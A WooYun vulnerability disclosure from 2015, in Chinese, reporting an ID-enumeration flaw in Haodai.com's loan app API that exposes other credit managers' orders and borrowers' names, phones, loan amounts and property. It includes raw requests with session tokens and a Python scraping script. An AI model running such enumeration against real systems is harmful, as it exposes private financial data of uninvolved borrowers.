当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148530

漏洞标题:好贷网可越权访问所有信贷经理的所有订单及客户信息(包括姓名、手机、借贷金额、房产等)

相关厂商:好贷网

漏洞作者: 路人甲

提交时间:2015-10-22 02:15

修复时间:2015-12-07 10:44

公开时间:2015-12-07 10:44

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-22: 细节已通知厂商并且等待厂商处理中
2015-10-23: 厂商已经确认,细节仅向厂商公开
2015-11-02: 细节向核心白帽子及相关领域专家公开
2015-11-12: 细节向普通白帽子公开
2015-11-22: 细节向实习白帽子公开
2015-12-07: 细节向公众公开

简要描述:

金融P2P安全之APP越权

详细说明:

目标:好贷网APP——信贷圈
注册信贷经理,登陆后,以下数据包可查看本人的信贷订单

POST http://interface.api.haodai.com/bapi/OrderDeal/getOrderList HTTP/1.1
Host: interface.api.haodai.com
Cookie2: $Version=1
Cookie: PHPSESSID=fu1q3oiq4r4d70adoeee6bkj30
Accept-Encoding: identity
Content-Length: 197
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
os_type=1&appid=1&imei=A0000038000000&app_version=28002&auth_tms=20151022003047&auth_did=74590&auth_dsig=5389c584d321d88b&auth_uid=230822&auth_usig=b733c47d9df4a4c5&xid=221322&p=0&pg_size=20&type=0


本人账号无客户,故返回details为空[]:

{"rs_code":1000,"rs_msg":"","details":[],"pin_id":0,"t":1445445572,"d":"2015-10-22 00:39:32","td":"20151022003932"}


其中,POST中的xid为被查询经理的id,此时只需枚举下xid,即可查看其它经理的订单信息。
根据这个原理,写了个Python批量操作~此处只查询id为(220821,221821)之间的~

#!/usr/bin/env python
#coding=utf8
import httplib, urllib, re, time
def Unicode_de(op):
    while re.search('\\\u[0-9a-fA-F]{4}',op):
        uni = re.search('\\\u[0-9a-fA-F]{4}',op).group()
        uni_asc = uni.replace('\\u','')
        try:
            uni_new = unichr(int(uni_asc,16))
        except:
            break
        op = op.replace(uni,uni_new)
    return op
httpClient = None
for userid in range(220821,221821):
    try:
        params = 'os_type=1&appid=1&imei=A0000038000000&app_version=28002&auth_tms=20151022003047&auth_did=74590&auth_dsig=5389c584d321d88b&auth_uid=230822&auth_usig=b733c47d9df4a4c5&xid='+str(userid)+'&p=0&pg_size=20&type=0'
        headers = {"Host": "interface.api.haodai.com", 
                   "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0", 
                   "Accept-Encoding": "identity", 
                   "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", 
                   "Cookie": "PHPSESSID=fu1q3oiq4r4d70adoeee6bkj30", 
                   "Cookie2": "$Version=1", 
                   "Connection": "keep-alive", 
                   "Content-Type": "application/x-www-form-urlencoded", 
                   "Content-Length": 197}
        httpClient = httplib.HTTPConnection("192.168.222.202", 8080, timeout=30)
        httpClient.request("POST", "http://interface.api.haodai.com/bapi/OrderDeal/getOrderList", params, headers)
    
        response = httpClient.getresponse()
        #print phonecode
        rp = response.read()
        if re.search('oid', rp,re.I):
            print "信贷经理id:", userid, "订单信息:", re.search('details.*}]', Unicode_de(rp), re.I).group()
    except Exception, e:
        print e
    finally:
        if httpClient:
            httpClient.close()


结果输出:

dd总.jpg


图中每行分别为一个信贷经理,第一个红框中的为每个信贷经理的ID,第二个红框中为各个经理的订单及借贷人信息,包括姓名、手机、借贷金额、房产等信息;由于每行后面数据太多,故截取了图中的第一个借贷经理(第一行,ID为220832)的信息展开,如下图:

dd分.jpg


篇幅关系,其他行的就不展开了~
同理:以下数据包为获取信贷经理的客户

POST http://interface.api.haodai.com/bapi/OrderDeal/getOrderList HTTP/1.1
Host: interface.api.haodai.com
Cookie2: $Version=1
Cookie: PHPSESSID=8gfnnl3f8u7dmfolgdqt2tj146
Accept-Encoding: identity
Content-Length: 205
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
os_type=1&appid=1&imei=A0000038000000&app_version=28002&auth_tms=20151022000846&auth_did=74590&auth_dsig=9427c1e80249cd65&auth_uid=230822&auth_usig=9a1cef0f9777cbb2&xid=221146&p=0&pg_size=2147483647&type=1


同样修改xid可枚举所有信贷经理的所有客户信息,包括姓名、手机、借贷金额、房产等

订单信息总.jpg


单据分.jpg


金融安全事关财产,其他数据就不挖了~

漏洞证明:

修复方案:

请多指教

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-10-23 10:43

厂商回复:

多谢

最新状态:

暂无